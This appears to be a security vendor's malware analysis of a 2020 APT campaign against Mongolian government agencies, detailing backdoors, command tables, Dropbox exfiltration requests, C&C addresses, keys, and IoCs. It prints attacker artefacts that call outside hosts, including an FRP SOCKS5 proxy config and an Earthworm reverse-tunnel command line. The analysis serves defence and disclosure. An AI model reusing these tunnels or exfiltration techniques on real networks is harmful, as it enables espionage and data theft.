1/15 December 9, 2020 APT Group Targeting Governmental Agencies in East Asia decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia Introduction  This summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center of Mongolia. We consider with moderate confidence based on our research that the chinese-speaking APT group LuckyMouse is behind the attack.  The APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities on the compromised network such as scanning of the local network and dumping credentials. We presume that the main aim of cyber-espionage was the exfiltration of sensitive data from potentially interesting government agencies. According to our local telemetries, we consider that the government institutions were attacked in two ways. One was through a vulnerable company who is providing services for these agencies, and the other was through an email spear-phishing with a malicious attachment – a weaponized document using CVE-2017-11882.  There are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing some previously undocumented tactics indicating that the actors have updated their toolset with Polpo and LuckyBack backdoors. Our analysis below will highlight those new tactics.  Attribution & Clusterization We base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found during the investigation of this campaign, most of them having previously been attributed to LuckyMouse by other researchers[1][2][3]. In 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing Asian government resources. Their blog posts described several tool sets such as network filtering driver NDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors), and Earthworm tunneler. They also described a DLL sideloading technique abusing legitimate applications from Symantec (IntgStat.exe). This is a legitimate application that loads a DLL pcalocalresloader.dll. By sideloading their own version pcalocalresloader.dll, they load HyperBro RAT from a compressed and encrypted file thumbs.db. While some of the tools that were used were publicly known tools that are available on the internet, the group also developed their own tools, including a rootkit[1][2]. In April 2019, PaloAlto Networks released a blogpost about LuckyMouse. According to the post, the group installed webshells on a SharePoint server to compromise Government Organizations in the Middle East. Similarly, the group used several publicly known and available tools (such as mimikatz, curl, ntbscan). But what got our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT attack we analyzed also used a DLL sideloading technique, although with different executables. The executable used was a Symantec application thinprobe.exe that loads thinhostprobedll.dll. This DLL was then used to sideload thumb.db that contained encrypted and compressed HyperBro[3]. We’ve also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This backdoor was accompanied by samples that are known to be used by the LuckyMouse group which lead us to the conclusion that this backdoor is a new addition into LuckyMouse’s toolkit. We also observed more common tools, e.g. VMProtect-obfuscated Earthworm tunneler, a custom installer dropping NDISProxy network filtering driver, and various network scanners. Infection Chain We observed that this APT group was also targeting an unknown company that was providing services to government institutions in East Asia. The group infiltrated the company’s computers and managed to harvest credentials belonging to the company’s email accounts. Unfortunately, we haven’t been able to identify which attack vector was used in this infiltration. These credentials were then used to send emails from the https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia https://securelist.com/luckymouse-hits-national-data-center/86083/ https://securelist.com/luckymouse-ndisproxy-driver/87914/ https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ https://securelist.com/luckymouse-hits-national-data-center/86083/ https://securelist.com/luckymouse-ndisproxy-driver/87914/ https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ 2/15 hacked company’s email accounts to the government officials. While we were unable to recover the whole email, we’ve managed to recover the email’s header. The header indicates that these emails were asking the recipient to update a firmware, i.e. launch a self-extracting 7-zip archive attached to this email. Date: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT)  Subject: Re: Perform a firmware update on the server XXXXXX_update.exe  (sha256:2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D) This archive drops three already familiar files – Symantec’s thinprobe.exe, malicious thinhostprobedll.dll, and thumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally loading its processed content – a HyperBro RAT . This backdoor has also been reported on by Kaspersky[1] and PaloAlto Networks[3], the latter providing an extensive description of the HyperBro RAT. Figure 1: Overview of infection vector Toolset In this following section we describe a tool set we found on the victim’s PC, used by the APT group for cyber-espionage and lateral movement through the network. We could divide these tools into three categories: Helpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector Remote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo Publicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler In detail, we found the following tools: StartServiceTool This tool installs wcm.dll into %WINDIR%\system32, a registry record HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsConnections Manager is created with the following values: Description: Makes automatic connect/disconnect decisions based on the network connectivity options currently available to the PC and enables management of network connectivity based on Group Policy settings. https://securelist.com/luckymouse-hits-national-data-center/86083/ https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ 3/15 DisplayName: Windows Connections Manager ServiceDll: C:\Windows\system32\wcm.dll. This effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts – embedded DLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the windows loader. The final payload DLL is written in GO and contains a single export named “Interface“. This function expects 4 arguments consisting of two strings and their corresponding lengths. The string values specify the victim ID and the Dropbox API key to use. The API key is passed in as an RC4 encrypted + base64 encoded value. The hardcoded decryption key is “0000111122223333“. The DLL additionally contains a default API key which appears to be for the authors test account. Initially, it tries do download a file from Dropbox via the HTTP API: POST /2/files/download HTTP/1.1 Host: content.dropboxapi.com User-Agent: Go-http-client/1.1 Content-Length: 0 Authorization: Bearer [snipped] Dropbox-Api-Arg: {“path”: “/infos/000000.txt”} Accept-Encoding: gzip If the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox: POST /2/files/upload HTTP/1.1 Host: content.dropboxapi.com User-Agent: Go-http-client/1.1 Content-Length: 36 Authorization: Bearer [snipped] Content-Type: application/octet-stream Dropbox-Api-Arg: {“path”: “/infos/116a0d.txt”,”mode”: “overwrite”,”autorename”: true,”mute”: false,”strict_conflict”: false} Accept-Encoding: gzip %currentDate% %currentTime%##%hostname% Afterwards, a C&C request-response loop is started. Based on the response from the C&C server, one of the following commands is executed: download files, upload files, sleep, quit, or execute commands on a command line. See the following diagram for a detailed flow, keep in mind that all download/upload are using the aforementioned Dropbox API: http://tishion.github.io/mmLoader/ 4/15 Figure 2: Overview of detailed execution flow ServiceInstaller We assume that this installer is intended to be executed by one of the aforementioned backdoors as it requires command-line parameters for its successful execution: Switch Argument -i  path of DLL to install as a service -u Uninstall a specific service name At first, security descriptors of both %windir%\system32\ and %windir%\system32\drivers\ changes to allow the current user to copy files to these locations. Then the installer copies a service executable to %windir%\system32\ under a randomly generated name (4 alphanumeric characters). Depending on whether a service named DFS Replication already exists in  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost netsvcs, a new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is created. More specifically, its parameters are: Description: “Configures Internet Authentication Service (IAS). If this service is stopped, the remote network access that requires user authentication will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is used to roam folders between PCs; on the server, it is used to provide high availability and local access across a wide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server become out-of-date. If the service is disabled, any services that explicitly depend on it will not start.” DisplayName: DFS Replication/IAS Jet Database Access Service %number% ServiceDll: C:\Windows\system32\<4 random alphanumeric characters>.dll. Tag: 0 Security: 0 ShellCodeExecutor This utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for decoding and unpacking can be seen below: 5/15 Figure 3: Decoding algorithm and executing decoded payload in allocated memory While we weren’t able to reconstruct which stage this executor was used, we were able to recover its parameter that corresponds to a hex- encoded metasploit-generated shellcode (reverse HTTP proxy – Github configured to connect to URL oss.chrome-upgrade[.]com (202.59.9[.]58). We suspect that the threat actors used the shellcode just to retrieve and execute a further stage from the C&C server. DataExtractor 1 This tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions. It recursively scans all connected drives for such documents that were modified in 2020 and later. Gathered documents are packed using Winrar and the archive is protected with a password “zaq1xsw@cde3”. This archive will be then saved to C:\MSBuild\NVIDIA\ under a filename CRYPTO-%computerName%- %number_value%.SYS. This scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after reboot), only documents that were modified in the last 24 hours are gathered. After each run, a file %windir%\system32\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C&C. Unfortunately, we were not able to recover this script. DataExtractor 2 This binary is a simple filescanner that is provided with a list of file extensions, a list of directories, and date boundaries as parameters. Every directory from the list is searched for files with a given file extension. If such files are found and their modification date is within the provided date boundaries (in UTC), their full paths are written down into the output file. These paths are delimited by Windows line delimiters and they are encoded in 16-bit Unicode. Below you will see a part of an error message, providing us the information about how this utility is used: T040ClientLite.exe suffix .txt,.xls scanDirs E:\\test,E:\\test1 output E:\\test\\output.txt startEditDate 2020/04/26 endEditDate 2020/04/27 More generally, the command’s format is: T040ClientLite.exe suffix scanDirs output startEditDate endEditDate Information Collector https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm 6/15 The Information Collector focuses on removable drives. If no such drives are connected, its execution is terminated. The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with a 64 byte XOR key, and stores it onto the system drive as hidden files. More specifically, it uses the following directories: C:\MSBuild\Resources\Format\S-1-1 (encrypted files) C:\MSBuild\Resources\Format\S-1-0\S-1-0-0 (unencrypted temporary files, deleted after encryption) Figure 4: Sample enumerate drives, checking their type with GetDriveTypeA It ensures its persistence by adding itself into Run (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) registry key under AvpSecurity. Interestingly, it contains many unused functions using command-line tools such as: systeminfo, arp, ipconfig, netstat, and tasklist. It also supports archiving the collected information using WinRAR with a hard-coded password “1qaz@WSX”. The sample has no networking capabilities. It primarily serves for collecting the information and transferring the gathered information using removable drives between the machines in the network. Moreover, the particular sample we analyzed contained a bug in the drives’ enumeration routine that made it virtually useless as it hampered all the sample’s functionality. RAT Korplug (PlugX) Korplug (PlugX) is a well-known Remote Access Trojan associated with Chinese speaking attackers and it has been used in a large number of targeted attacks since 2012[4]. It uses DLL side-loading to load itself into the memory through legitimate applications. It helps it stay unnoticed by any security product. Korplug is a fully featured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to a remote cmd.exe shell.  In our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was signed with a valid, but expired certification. After executing unsecapp.exe, it loads a malicious DLL http_dll.dll. This DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug which is then loaded into the memory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped and executed these files. Address of C&C servers:  web[.]microlynconline[.]com:80 home[.]microlynconline[.]com:8000 help[.]microlynconline[.]com:443 host[.]microlynconline[.]com:53 Backdoors https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/ 7/15 We found three different backdoors in the government office network, two of which, PolPo and LuckyBack, were never seen in any previous campaign. Polpo also hits the National Data Center, and the two others, BlueTraveller and LuckyBack, only hit the government office network. LuckyBack LuckyBack collects the computer’s fingerprint, at first, and then tries to establish a communication with the C&C server (45.77.55[.]145). Once the communication is established, the backdoor starts listening for commands. It is capable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and screen capturing. Technical: At first, the used code page is retrieved by calling chcp, a command providing the keyboard and character set information, on the system drive. The first request on the C&C server “registers” the device by providing its fingerprint. Namely, the fingerprint is constructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP address, code page, and RDP session ID. If the server accepts the registration, it responds with the PID and a simple string “OK”. Afterwards, a simple request-response C&C loop is started, and commands and their corresponding numbers are displayed in the table below: Commands Functions 0x70, 0x72 Receive data again 0x1, 0x11 Creates remote shell or quit remote shell 0x2 File size and last write from spec. file 0x3 It’s reads data from specific offset and file 0x4 Gets file size 0x12 Delete spec. file 0x13 Terminate specific thread 0x14 Receiving reading configuration 0x22 Execute %command% via CreateProcess API 0x23 Set a reading configuration for 0x3 command 0x24 Writes data to specific file 0x32 File operations (move file from one location to another) 0x50 Start keylogging 0x51 Stop keylogging 0x60 Take screenshot BlueTraveller This backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload, download, and execute on the command line. Nevertheless, it uses two layers of C&C servers, meaning that the first request is on the first layer, and it yields an IP address of a C&C server from the second layer. Afterwards, the request-response C&C loop uses the second layer. If the backdoor receives a command for the command line, the output from the console is encrypted with AES-256 and sent back to the second-layer C&C server. The binary itself has its strings encrypted with RC4, using a hardcoded key “L!Q@W#E$R%T^Y&U*A|}t~k”. Among these strings, we may find the address of the first-layer C&C server and the user agent that should be used for these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. The response seems to be pretty inconspicuous at first glance. But once we have a look more closely, we see that many lines are followed by a mixture of tabs and spaces,which is rather fishy indeed. And surprisingly this is where the IP address of the second C&C layer hides! https://decoded.avast.io/luigicamastra/blank 8/15 Figure 5: Response from first layer of C&C server 9/15 Figure 6: Script which decrypts the white spaces from the html response The BlueTraveller uses the same scheme for encryption – AES-256 with a key derived from a string that is hashed with SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C&C. For this first request, the key is derived from a string “0304276cf4f31345“. The key is then used to encrypt the generated GUID and the computer’s hostname which are then Base64- encoded and used to generate the request URL:   http:///home///. After this request is executed, commands are retrieved from: http:///index.htm. The obtained data is encrypted with AES-256, using the aforementioned approach with GUID as a base-string for the key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch, the command is discarded. If a command for the command line is received, the output of the executed command (AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to http:///help///. Polpo Polpo is a backdoor that we’ve been seeing in the wild since 2018. It supports around 15 different commands including information collection and exfiltration, file transfer, and proxy connections. Base64 IP MjAzLjkxLjExOS40OjgwMDA=  203.91.119[.]4:8000 MjAyLjE3OS4wLjE0Mjo4MDgw 202.179.0[.]142:8080 10/15 MjAyLjE3OS41LjE2MTo0NDM=  202.179.5[.]161:443 Base64-encoded addresses of C&C servers are hard-coded in the binary Polpo – Communication The backdoor mimics the HTTP protocol to blend with the normal traffic. The transferred data is encrypted with AES and encoded into Base64 then sent as a part of fake HTML content.  Figure 7: Command data parsing The AES encryption key is derived from the first packet of each new command received from the C&C server, using the algorithm below: Figure 8: Encryption key computation The sample checks for a proxy configured on the system found in the Registry Key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable. If a proxy is configured it uses the server specified in Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer for all the connections.  Polpo – Functionality There are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the commands are executed in separate threads. Errors and inter-thread communication are handled using Events. Figure 9: Command dispatcher These commands are supported by the version of Polpo we’ve analyzed: Main commands Sub commands Functions 0x1FFFFFF   Initialize CLI Interface   0x101FFFF CLI Spawn CMD.EXE   0x102FFFF CLI Write Data To File 11/15   0x103FFFF CLI List Directory   0x104FFFF CLI ShellExecuteW(0, “Open”, Cmd, 0, 0)   0x106FFFF CLI Change Directory   0x107FFFF CLI Delete File 0x2EEEEEE   Commands   0x201EEEE Enumerate Drives Info   0x202EEEE Enumerate Files   0x203EEEE Send File To C&C   0x204EEEE Write Data To File   0x 205EEEE Run Default App   0x206EEEE Shell Execute Open   0x207EEEE Delete File   0x208EEEE Delete Files Recursive 0x3DD03DD   Serve As Proxy (Hide As Http)   0x30103DD Get Data To Transfer 0x3DDDDDD   Serve As Proxy (Raw Data) 0x5FFFFFF   Close Connection 0x60AAAAAA   Close Connection 0x70BBBBBB   Reboot 0x80CCCCCC   Shutdown System 0xAFFFFFF   Send File To C&C UAC bypass tool An open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage) was detected on several compromised devices. It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to execute tasks and programs under administrator- level permissions.  Port-scanners Several different port scanners were seen on compromised devices under various filenames. One of the used port scanners was open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the ports of the server to find out which services were running. Nbtscan Nbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the network. Passwords dumpers Mimikatz and Lazagne were seen on the infected computers. We presume that they were used to retrieve credentials from the compromised computers. We’ve also spotted a wrapped Mimikatz version, download from https://github.com/jas502n/mimikat_ssp, on several compromised devices. FRP Fast Reverse Proxy (FRP) is a tool that allows you to expose local services that are hidden behind the NAT or a firewall to the internet. Both the raw TCP and UDP are supported as well as several other protocols whose requests can be forwarded to the internal services via this proxy. We’ve recovered a configuration file 3bef4cd.tmp for this proxy. The content of this proxy is the following: https://github.com/vestjoe/WinPwnage#uac-bypass-techniques https://github.com/kingron/s https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne https://github.com/jas502n/mimikat_ssp 12/15 [common] server_addr = 202.59.9[.]58 server_port = 8443 privilege_token = %token% [SDJY_proxy] type = tcp remote_port = 6001 plugin = socks5 It is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network via 202.59.9[.]58:8443. Figure 10: Diagram of FRP tool usage Earthworm tunneler The Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky[1]. We’ve seen this tool on all compromised systems of national data center. On one of these devices, we’ve managed to recover command-line parameters that were used:  -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a SOCKS tunnel to the provided server. It is publically available at http://rootkiter.com/EarthWorm/. Conclusions As this blogpost demonstrates, LuckyMouse has used new methods to infiltrate the government institution through a third party’s system which they attacked.  Avast has recently protected users in the government institution and national data center from further attacks using the samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in the whitespace of the C&C response. We presume that the attackers updated their attacking toolset in this campaign after it was discovered by Avast. I would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research. Indicators of Compromise (IoC)  Repository: https://github.com/avast/ioc/tree/master/  List of SHA-256: https://github.com/avast/ioc/blob/master/ MITRE ATT&CK techniques http://rootkiter.com/EarthWorm/ https://github.com/avast/ioc/tree/master/LuckyMouse https://github.com/avast/ioc/blob/master/LuckyMouse/samples.sha256 13/15 Tactic ID Name Comment Initial Access T1199 Trusted Relationship Sending emails from hacked trusted email accounts T1566.001 Spear Phishing Attachment Emails with malicious documents and software updates Execution T1059.003 Windows Command Shell   T1204.002 Malicious File   T1203 Exploitation for Client Execution Documents weaponized with CVE-2017- 11882 – Equation Editor T1106 Native API Windows API CreateProcessW  Persistence T1547.001 Registry Run Keys Using “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AvpSecurity T1543.003 Create or Modify System Process: Windows Service Multiple samples create services for persistence Privilege Escalation T1548.002 Bypass User Access Control WinPwnage tool T1543.003 Create or Modify System Process: Windows Service Installs services in: “HKLM\SYSTEM\CurrentControlSet\Services\” Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading HyperBro was loaded,decrypted, decompressed and executed by a legitimate application using this technique. T1564.001 Hidden Files and Directories Hiding collected information in hidden directories and files T1027 Obfuscated Files or Information Collected information is encrypted using byte XOR operation T1218.011 Rundll32 Executing shell code T1218 Signed Binary Proxy Execution thinprobe.exe (Symantec), unsecapp.exe (ESET) Credential Access T1003.001 LSASS Memory Mimikatz T1552 Unsecured Credentials Lasagne 14/15 Discovery T1083 File and Directory Discovery Search for sensitive documents with extensions pdf, ppt, xls, doc T1046 Network Service Scanning used publicly available tools “nbtscan” and port scanner “s” T1120 Peripheral Device Discovery Searching for removable drives on the system T1082 System Information Discovery   Lateral Movement T1091 Replication Through Removable Media Information Collector is capable of copying binary files to removable drives  Collection T1560.001 Archive Collected Data: Archive via Utility hides exfiltrated documents in password-protected .rar archives. T1119 Automated Collection   T1056.001 Input Capture: Keylogging Used in LuckyBack backdoor Command and Control T1071.001 Application Layer Protocol: Web Protocols Polpo: HTTP is used for communications with C2 T1132.001 Data Encoding: Standard Encoding Polpo: Encrypted data is encoded as Base64 T1573.001 Encrypted Channel: Symmetric Cryptography Polpo: Transfered data is encrypted with AES T1104 Multi-Stage Channels BlueTraveller: multiple C&C servers are used T1090.001 Proxy: Internal Proxy Polpo: serves as proxy in the network Exfiltration T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB Information Collector moves files in the network over removable drives  T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage StartServiceTool: Dropbox is used for exfiltration of collected data T1041 Exfiltration Over C2 Channel Polpo exfiltrated data to C&C server References [1] https://securelist.com/luckymouse-hits-national-data-center/86083/ https://securelist.com/luckymouse-hits-national-data-center/86083/ 15/15 [2] https://securelist.com/luckymouse-ndisproxy-driver/87914/ [3] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ [4] https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/ https://securelist.com/luckymouse-ndisproxy-driver/87914/ https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/